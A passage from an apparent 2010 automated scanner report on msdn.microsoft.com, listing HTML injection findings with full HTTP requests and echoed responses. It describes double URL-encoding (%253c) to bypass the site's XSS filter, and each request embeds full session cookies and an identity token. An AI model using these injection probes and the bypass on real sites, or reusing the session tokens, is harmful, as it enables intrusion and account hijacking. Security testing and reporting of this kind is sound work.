msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25588
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/ms348103.aspx?f6d48"><a>3d147823d73=1" />
...[SNIP]...

2.14. http://msdn.microsoft.com/cc300389.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /cc300389.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5db99"><a>00ccaba71ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cc300389.aspx?5db99"><a>00ccaba71ba=1 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30835
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/cc300389.aspx?5db99"><a>00ccaba71ba=1" />
...[SNIP]...

2.15. http://msdn.microsoft.com/en-us/library(d=loband [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library(d=loband

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b5a%2522%253e%253ca%253e034bccb92c5 was submitted in the REST URL parameter 1. This input was echoed as 76b5a"><a>034bccb92c5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us76b5a%2522%253e%253ca%253e034bccb92c5/library(d=loband HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us76b5a"><a>034bccb92c5/library(d=loband" />
...[SNIP]...

2.16. http://msdn.microsoft.com/en-us/library/aa155072.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa155072.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfb1e%2522%253e%253ca%253e76f5534360f was submitted in the REST URL parameter 1. This input was echoed as dfb1e"><a>76f5534360f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usdfb1e%2522%253e%253ca%253e76f5534360f/library/aa155072.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usdfb1e"><a>76f5534360f/library/aa155072" />
...[SNIP]...

2.17. http://msdn.microsoft.com/en-us/library/aa155072.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa155072.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9866b%2522%253e%253ca%253e65c7083c4f8 was submitted in the REST URL parameter 2. This input was echoed as 9866b"><a>65c7083c4f8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library9866b%2522%253e%253ca%253e65c7083c4f8/aa155072.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9866b"><a>65c7083c4f8/aa155072" />
...[SNIP]...

2.18. http://msdn.microsoft.com/en-us/library/aa155072.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa155072.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d906d%2522%253e%253ca%253eab4656b12f7 was submitted in the REST URL parameter 3. This input was echoed as d906d"><a>ab4656b12f7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/aa155072.aspxd906d%2522%253e%253ca%253eab4656b12f7 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa155072.aspxd906d"><a>ab4656b12f7" />
...[SNIP]...

2.19. http://msdn.microsoft.com/en-us/library/aa155073.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa155073.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbc85%2522%253e%253ca%253e836b0a1a57e was submitted in the REST URL parameter 1. This input was echoed as fbc85"><a>836b0a1a57e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

